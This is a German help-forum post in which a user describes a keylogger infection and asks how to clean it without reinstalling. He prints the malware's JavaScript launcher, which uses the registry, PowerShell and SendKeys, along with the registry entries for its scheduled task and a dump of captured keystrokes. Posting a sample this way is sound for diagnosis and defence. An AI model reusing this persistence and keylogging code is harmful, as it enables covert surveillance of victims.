Keylogger am Werk?

dslthomas · 25.03.2024, 01:45

Moin, Moin,

nun muss ich leider auch dieses Board in Anspruch nehmen. Ich habe das Problem, dass ich mir einen Keylogger etc. eingefangen habe. Es hatte sich bemerkbar gemacht, indem mein Browserfenster in den Vollbildmodus wechselte (Habe das sonst nur im unterem Bildschirmbereich offen) und es versuchte "jemand" die Paypal-Seite aufzurufen. Das ist erst mal ok (Gerade weil ich kein PayPal habe

).

Hier mal meine Beobachtungen und Vermutungen in Stichworten:

Es muss Scriptgesteuert gewesen sein, da dieser Vorgang auch OHNE Netzwerk weiter ging
Er legte einige VB-Scripte und com.exe-Dateien in meinem *\AppData\Roaming ab
Es fanden sich verschiede Reg-Keys unter HKEY_CURRENT_USER\Software\yRkawdXSgdbJmzp
Im Verzeichnis *\AppData\Roaming\Microsoft\Windows\Templates\ befanden sich ebenfalls JavaScript-Dateien welche die gleiche Benamung wie die Reg-Keys hatte (yRkawdXSgdbJmzp.js)

Inhalt der Datei yRkawdXSgdbJmzp.js:

Code:

ATTFilter

//yRkawdXSgdbJmzp
var objShell = new ActiveXObject("WScript.Shell");

function IsProcessRunning(processName) {
    var objWMIService = GetObject("winmgmts:\\\\.\\root\\cimv2");
    var colProcesses = objWMIService.ExecQuery("SELECT * FROM Win32_Process WHERE Name='" + processName + "'");
    
    return colProcesses.Count > 0;
}

function RunPowerShellCommands() {
    var windowsDir = objShell.ExpandEnvironmentStrings("%windir%");
    objShell.Run(windowsDir + "\\system32\\WindowsPowerShell\\v1.0\\powershell.exe", 2);
    
    var colProcesses = GetObject("winmgmts:").InstancesOf("Win32_Process");
    var enumerator = new Enumerator(colProcesses);
    
    for (; !enumerator.atEnd(); enumerator.moveNext()) {
        var objProcess = enumerator.item();
        if (objProcess.Name.toLowerCase() === "powershell.exe") {
            objShell.AppActivate(objProcess.ProcessId);
            objShell.SendKeys(objShell.RegRead("HKEY_CURRENT_USER\\Software\\yRkawdXSgdbJmzp\\v"));
            objShell.SendKeys("{ENTER}");
            objShell.SendKeys("Stop-Process -Name conhost -Force");
            objShell.SendKeys("{ENTER}");
            
            WScript.Sleep(5000);
            break;
        }
    }
}

for (var i = 0; i <= 10000; i++) {
    if (!IsProcessRunning(objShell.RegRead("HKEY_CURRENT_USER\\Software\\yRkawdXSgdbJmzp\\i"))) {
        RunPowerShellCommands();
    }
    
    WScript.Sleep(10000);
}

Ein Registry-Eintrag dazu findet sich hier:

Code:

ATTFilter

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{97E873B8-E0BC-4E2C-A97B-2BFF2CD6D8E6}]
"Path"="\\yRkawdXSgdbJmzp"
"Hash"=hex:7b,1f,86,91,3e,8d,64,5d,08,d6,20,87,56,d1,64,27,4d,73,c8,62,65,5a,\
  99,7d,f7,e8,a0,c8,34,c4,78,05
"Schema"=dword:00010002
"URI"="\\yRkawdXSgdbJmzp"
"Triggers"=hex:17,00,00,00,00,00,00,00,01,07,03,00,00,00,06,00,00,80,63,3b,59,\
  6f,da,01,00,07,03,00,00,00,06,00,ff,ff,ff,ff,ff,ff,ff,ff,38,21,41,42,48,48,\
  48,48,76,7d,16,a8,48,48,48,48,0e,00,00,00,48,48,48,48,41,00,75,00,74,00,68,\
  00,6f,00,72,00,00,00,48,48,00,00,00,00,48,48,48,48,00,48,48,48,48,48,48,48,\
  00,48,48,48,48,48,48,48,01,00,00,00,48,48,48,48,1c,00,00,00,48,48,48,48,01,\
  05,00,00,00,00,00,05,15,00,00,00,5b,fd,fa,f6,ac,1a,e5,15,b1,e5,31,30,53,04,\
  00,00,48,48,48,48,2c,00,00,00,48,48,48,48,54,00,48,00,4f,00,4d,00,41,00,53,\
  00,2d,00,52,00,45,00,49,00,43,00,48,00,45,00,4c,00,5c,00,74,00,68,00,6f,00,\
  6d,00,61,00,73,00,00,00,48,48,48,48,2c,00,00,00,48,48,48,48,58,02,00,00,10,\
  0e,00,00,80,f4,03,00,ff,ff,ff,ff,07,00,00,00,00,00,00,00,00,00,00,00,00,00,\
  00,00,00,00,00,00,00,00,00,00,00,00,00,00,48,48,48,48,dd,dd,00,00,00,00,00,\
  00,01,07,03,00,00,00,06,00,00,80,63,3b,59,6f,da,01,00,00,00,00,00,00,00,00,\
  00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,3c,\
  00,00,00,00,00,00,00,ff,ff,ff,ff,00,00,00,00,00,00,00,00,00,00,00,00,00,01,\
  f8,9e,01,00,00,00,00,00,00,00,75,02,00,00,00,00,00,00,48,48,48,48
"Actions"=hex:03,00,0c,00,00,00,41,00,75,00,74,00,68,00,6f,00,72,00,66,66,00,\
  00,00,00,ba,00,00,00,43,00,3a,00,5c,00,55,00,73,00,65,00,72,00,73,00,5c,00,\
  54,00,68,00,6f,00,6d,00,61,00,73,00,2e,00,54,00,48,00,4f,00,4d,00,41,00,53,\
  00,2d,00,52,00,45,00,49,00,43,00,48,00,45,00,4c,00,5c,00,41,00,70,00,70,00,\
  44,00,61,00,74,00,61,00,5c,00,52,00,6f,00,61,00,6d,00,69,00,6e,00,67,00,5c,\
  00,4d,00,69,00,63,00,72,00,6f,00,73,00,6f,00,66,00,74,00,5c,00,57,00,69,00,\
  6e,00,64,00,6f,00,77,00,73,00,5c,00,54,00,65,00,6d,00,70,00,6c,00,61,00,74,\
  00,65,00,73,00,5c,00,79,00,52,00,6b,00,61,00,77,00,64,00,58,00,53,00,67,00,\
  64,00,62,00,4a,00,6d,00,7a,00,70,00,2e,00,6a,00,73,00,00,00,00,00,00,00,00,\
  00,00,00
"DynamicInfo"=hex:03,00,00,00,47,59,25,20,37,7e,da,01,b6,57,26,15,48,7e,da,01,\
  00,00,00,00,e0,10,07,80,45,bc,39,f8,45,7e,da,01

und einer hier:

Code:

ATTFilter

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\yRkawdXSgdbJmzp]
"SD"=hex:01,00,04,80,88,00,00,00,98,00,00,00,00,00,00,00,14,00,00,00,02,00,74,\
  00,04,00,00,00,00,10,18,00,9f,01,1f,00,01,02,00,00,00,00,00,05,20,00,00,00,\
  20,02,00,00,00,10,14,00,9f,01,1f,00,01,01,00,00,00,00,00,05,12,00,00,00,00,\
  10,18,00,ff,01,1f,00,01,02,00,00,00,00,00,05,20,00,00,00,20,02,00,00,00,00,\
  24,00,89,00,12,00,01,05,00,00,00,00,00,05,15,00,00,00,5b,fd,fa,f6,ac,1a,e5,\
  15,b1,e5,31,30,53,04,00,00,d0,76,3e,0d,01,02,00,00,00,00,00,05,20,00,00,00,\
  20,02,00,00,01,05,00,00,00,00,00,05,15,00,00,00,5b,fd,fa,f6,ac,1a,e5,15,b1,\
  e5,31,30,01,02,00,00
"Id"="{97E873B8-E0BC-4E2C-A97B-2BFF2CD6D8E6}"
"Index"=dword:00000003

Hier nun die Logs.. hxxp://5.189.183.113/FIRST.txt

und die hxxp://5.189.183.113/Addition.txt

Zu HiJackThis-Zeiten war es für mich einfacher die Logs zu sichten bzw mit Hilfe auszuwerten. Nun bin ich wirklich komplett auf Eure Hilfe angewiesen. F-Secure sagt keinen Mucks.

Ach ja,- wie komme ich auf Keylogger.... Nun es wurde ein Registry-Key erstellt, wo offensichtlich alles abgelegt wurde:

Code:

ATTFilter

Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\3cec14c682a69cb8fafb5026acd55133]
"[kl]"=" 24.03.24 powershell Windows PowerShell eoteNc.lKc 24.03.24 TOTALCMD64 Total Commander (x64) 11.03 l[ENTER]regereged[Delete] 24.03.24 TOTALCMD64 Total Commander (x64) 11.03 [ENTER] 24.03.24 TOTALCMD64 Total Commander (x64) 11.03 .zaak[ENTER] 24.03.24 chrome \"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --no-startup-window --win-session-start - Google Suche - Google Chrome [Back]\"[ENTER] 24.03.24 chrome MicrosoftEdgeAutoLaunch_22BF80BC2136A2C83F26CA891AE199D8 - Google Suche - Google Chrome [Back][ENTER] 24.03.24 explorer Opera ...[Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back]192.168.0.30[ENTER] 24.03.24 chrome B0A95C82BA6D3B5A9F4A - Google Suche - Google Chrome Changzih[ENTER] 24.03.24 chrome Changzhi - Google Suche - Google Chrome  HKCU[ENTER] 24.03.24 TOTALCMD64 Total Commander (x64) 11.03 [Back][ENTER]hjt[ENTER][Back][ENTER] 24.03.25 chrome Neuer Tab - Google Chrome  log auswerten[ENTER] 24.03.25 chrome www.hijackthis.de - Google Chrome [Back][Back][ENTER] 24.03.25 explorer hjt [Delete] 24.03.25 chrome Trojaner-Board - Neues Thema erstellen - Google Chrome Keylogger am Werk?Moin, Moin,[ENTER]nun muss ich leider auch mal wieder d[Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back]dieses Board in Anspruch nehmen. Ich habe das Problem, dass ich mir einen Keylogger etc. eingefangen habe. Es hatte sich bemerkbar gemacht, indem mein Bw[Back]rowserfenster in den Vollbildmodus wechselte (Habe das sonst nur im unterem Bildschirmbereich offen) und es versuchte sich jemand mir [Back][Back]t [Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back]\"jemand\" die Paypal-Seite aufzurufen. Das ist erst mal ok (Gerade weil ich kein PayPal habe :-) [Back][Back][Back][Back] ). Der Z[Back][Back][Back][Back][Back][Back][ENTER]Hier mal meine Beobachtungen und vermutungen in Stichworten:[ENTER]Es muss Scriptgesteuert gewesen sein, da dieser Vorgang auch OHNE Netzwerk weiter gingEr legte einige VB-Scripte und com.exe-Dateien in meinem AppData/Local abEs fanden sich verschiede Reg-Kay[Back][Back]es[Back]ys unter HKEY_CURRENT_USERSoftwareyRkawdb ....[Delete][Delete]Roaming[Back][ENTER]*Im Verzeichnis [Back]** befanden sich ebenfalls JavaScript-Dateien welche die gleiche Beh[Back]nahmung wie die Reg-Keys hatte ()[ENTER]Inhalt der Datei .js [Back]:[ENTER] 24.03.25 TOTALCMD64 [2] Total Commander (x64) 11.03 [Delete] 24.03.25 TOTALCMD64 [2] Total Commander (x64) 11.03 [ENTER] 24.03.25 chrome Trojaner-Board - Neues Thema erstellen - Google Chrome Hier nun die Logs:[Back].. FRST.txt[ENTER]und die Additional[Back][Back].txt:[ENTER]Zu -Zeiten war es für mich einfacher die Logs zu sichten bzw mit Hilfe auszuwerten. Nun bin ich wirklich komplett auf Eure Hilfe angewiesen. F-Secure sagt keinen Muks[Back][Back]cks [Back].  24.03.25 TOTALCMD64 [2] Total Commander (x64) 11.03 [Delete] 24.03.25 TOTALCMD64 [2] Total Commander (x64) 11.03 [ENTER] 24.03.25 chrome Trojaner-Board - Neues Thema erstellen - Google Chrome Ein Registry-Eintrag dazu findet sich hier:[ENTER]und einer hier:[ENTER]"

der hat sogar jetzt noch alles mit geloggt.....

Wie bekomme ich den Sch... weg ohne neu zu installieren? Der Aufwand wäre immens zumal ich nicht weis, wie das ganze ins System gelangt ist.

Danke und Gruß aus Hamburg.

Keylogger am Werk?

Log-Analyse und Auswertung: Keylogger am Werk?

Keylogger am Werk?

Ähnliche Themen: Keylogger am Werk?